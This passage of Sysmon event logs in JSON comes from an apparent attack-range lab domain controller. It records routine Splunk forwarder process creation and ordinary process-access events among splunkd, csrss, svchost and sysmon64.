MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:31.929","ProcessGuid":"{41C8662E-1F7B-5F25-0000-0010041A0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2273,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.095\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F7B-5F25-0000-0010041A0400}\r\nTargetProcessId: 4048\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.095","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F7B-5F25-0000-0010041A0400}","TargetProcessId":"4048","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2274,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.095\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F7B-5F25-0000-0010041A0400}\r\nTargetProcessId: 4048\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.095","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F7B-5F25-0000-0010041A0400}","TargetProcessId":"4048","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2275,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2276,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2277,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2278,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2279,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2280,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 